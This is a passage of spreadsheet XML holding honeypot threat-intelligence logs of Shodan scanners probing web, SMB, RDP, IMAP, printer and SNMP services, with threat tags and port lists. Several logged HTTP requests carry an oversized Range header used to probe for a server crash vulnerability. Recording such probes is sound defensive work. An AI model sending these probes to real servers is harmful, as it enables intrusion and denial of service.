'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '5.181.21.224', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '5.181.21.224', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '5.181.21.224', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '5.181.21.224', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '5.181.21.224', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'INFD0'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '194.4.48.242', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '194.4.48.242', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '194.4.48.242', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '194.4.48.242', 'Range': 'bytes= 0 - 018446744073709551615', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=2k0s4ofc'}}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,52750)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,52760)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,52770)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,36354)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,44352)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,44356)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=f1nv0nxj'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ijj3hyip'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'HOKK0'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '144.126.148.5', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '144.126.148.5', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=1b5zzs42'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '38.54.42.176', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '38.54.42.176', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '38.54.42.176', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '38.54.42.176', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.42.176', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '38.54.117.64', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '38.54.117.64', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '38.54.117.64', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '144.126.148.5', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,38724)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,38738)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=7a5irji5'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'BPCK0'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'HPDL0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'JMLF0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'EMOA0'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=4zv3zbsd'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'HEEK0'}}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,58392)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,58408)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=7gnva6og'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'LAKP0'}}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,38348)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,38364)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,38368)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '185.234.67.80', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '185.234.67.80', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '185.234.67.80', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '185.234.67.80', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '5.253.43.207', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '5.253.43.207', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '5.253.43.207', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '5.253.43.207', 'Range': 'bytes= 0 - 018446744073709551615', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,44796)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,44798)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,44810)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'identity', 'Host': '66.94.127.183', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'identity', 'Host': '66.94.127.183', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,45296)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,45304)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.35,45310)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:b98e:ec23</t>
  </si>
  <si>
    <t>25d7a1aabb8ce5e0de8e95e9fec13a5d</t>
  </si>
  <si>
    <t>185.142.236.34</t>
  </si>
  <si>
    <t>hat.census.shodan.io&amp;&amp;NA</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_IRC_H30&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_IMAP_H35&amp;&amp;SMA-LAB_LDAP_H18&amp;&amp;SMA-LAB_REDIS_H8&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_ORACLE_H41&amp;&amp;SMA-LAB_PJL_H38&amp;&amp;SMA-LAB_SNMP_H9&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_SNMP_H25&amp;&amp;SMA-LAB_SMTP_H31&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_FTP_H29&amp;&amp;SMA-LAB_POSTGRES_H37&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_SMTP_H28&amp;&amp;SMA-LAB_REDIS_H22&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_REDIS_H46&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_LDAP_H41&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_RDP_H38&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_SNMP_H26&amp;&amp;SMA-LAB_PJL_H11&amp;&amp;SMA-LAB_REDIS_H21&amp;&amp;SMA-LAB_SOCKS5_H8&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_SNMP_H34&amp;&amp;SMA-LAB_MYSQL_H47&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_IRC_H11&amp;&amp;SMA-LAB_IRC_H22&amp;&amp;SMA-LAB_SIP_H45&amp;&amp;SMA-LAB_SNMP_H10&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_NTP_H39&amp;&amp;SMA-LAB_PJL_H21&amp;&amp;SMA-LAB_IRC_H17&amp;&amp;SMA-LAB_SNMP_H28&amp;&amp;SMA-LAB_PJL_H22&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_POP3_H44&amp;&amp;SMA-LAB_SMB_H10&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_SNMP_H27&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_RDP_H35&amp;&amp;SMA-LAB_REDIS_H41&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_SNMP_H37&amp;&amp;SMA-LAB_FTP_H40&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_POSTGRES_H15&amp;&amp;SMA-LAB_LDAP_H10&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_SMB_H40&amp;&amp;SMA-LAB_NTP_H41&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_POSTGRES_H4&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_MYSQL_H21&amp;&amp;SMA-LAB_IRC_H8&amp;&amp;SMA-LAB_SMTP_H9&amp;&amp;SMA-LAB_REDIS_H26&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_SOCKS5_H29&amp;&amp;SMA-LAB_SNMP_H31&amp;&amp;SMA-LAB_SIP_H32&amp;&amp;SMA-LAB_MYSQL_H39&amp;&amp;SMA-LAB_IRC_H31&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_LDAP_H39&amp;&amp;SMA-LAB_SMTP_H25&amp;&amp;SMA-LAB_POSTGRES_H9&amp;&amp;SMA-LAB_NTP_H44&amp;&amp;SMA-LAB_SNMP_H12&amp;&amp;SMA-LAB_RDP_H14&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_IMAP_H33&amp;&amp;SMA-LAB_POP3_H2&amp;&amp;SMA-LAB_IRC_H15&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_SOCKS5_H39&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_POP3_H33&amp;&amp;SMA-LAB_PJL_H34&amp;&amp;SMA-LAB_PJL_H29&amp;&amp;SMA-LAB_IRC_H26&amp;&amp;SMA-LAB_NTP_H22&amp;&amp;SMA-LAB_IRC_H40&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_ORACLE_H47&amp;&amp;SMA-LAB_SMTP_H12&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_SIP_H5&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_POSTGRES_H5&amp;&amp;SMA-LAB_SMTP_H46&amp;&amp;SMA-LAB_IMAP_H37&amp;&amp;SMA-LAB_LDAP_H36&amp;&amp;SMA-LAB_SOCKS5_H32&amp;&amp;SMA-LAB_POP3_H47&amp;&amp;SMA-LAB_SIP_H25&amp;&amp;SMA-LAB_REDIS_H14&amp;&amp;SMA-LAB_SOCKS5_H35&amp;&amp;SMA-LAB_SNMP_H22&amp;&amp;SMA-LAB_FTP_H45&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_SOCKS5_H9&amp;&amp;SMA-LAB_POP3_H17&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_IRC_H24&amp;&amp;SMA-LAB_SOCKS5_H23</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;28555&amp;&amp;6667&amp;&amp;143&amp;&amp;389&amp;&amp;6379&amp;&amp;1080&amp;&amp;1521&amp;&amp;9100&amp;&amp;161&amp;&amp;25&amp;&amp;23&amp;&amp;5432&amp;&amp;8443&amp;&amp;445&amp;&amp;29011&amp;&amp;1433&amp;&amp;3389&amp;&amp;3306&amp;&amp;5900&amp;&amp;NA&amp;&amp;110&amp;&amp;17553&amp;&amp;23320&amp;&amp;26312&amp;&amp;47964&amp;&amp;22947&amp;&amp;10864&amp;&amp;21&amp;&amp;443&amp;&amp;22601&amp;&amp;30878&amp;&amp;16698&amp;&amp;29586&amp;&amp;30378&amp;&amp;26310&amp;&amp;26200&amp;&amp;14265&amp;&amp;28821&amp;&amp;33710&amp;&amp;18438</t>
  </si>
  <si>
    <t>connection&amp;&amp;NA&amp;&amp;login&amp;&amp;query&amp;&amp;command&amp;&amp;request&amp;&amp;GET&amp;&amp;stshash</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=185.142.236.34;rport=26810'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'KEBO0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'A001'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.5.0', 'version': '0'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '38.54.42.176', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '38.54.42.176', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '38.54.42.176', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '38.54.42.176', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'identity', 'Host': '154.26.156.60', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'identity', 'Host': '154.26.156.60', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'identity', 'Host': '154.26.156.60', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '194.233.76.135', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '194.233.76.135', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '194.233.76.135', 'Range': 'bytes= 0 - 018446744073709551615', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'identity', 'Host': '66.94.127.183', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'identity', 'Host': '66.94.127.183', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,52158)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,52250)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,52364)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '5.182.38.84', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '5.182.38.84', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'PENJ0'}}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,40756)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,42912)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,44226)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'PKDB0'}}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,50188)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,51134)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,51628)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,54780)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,55498)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,55696)}&amp;&amp;{Data_SMB:User . authenticated successfully 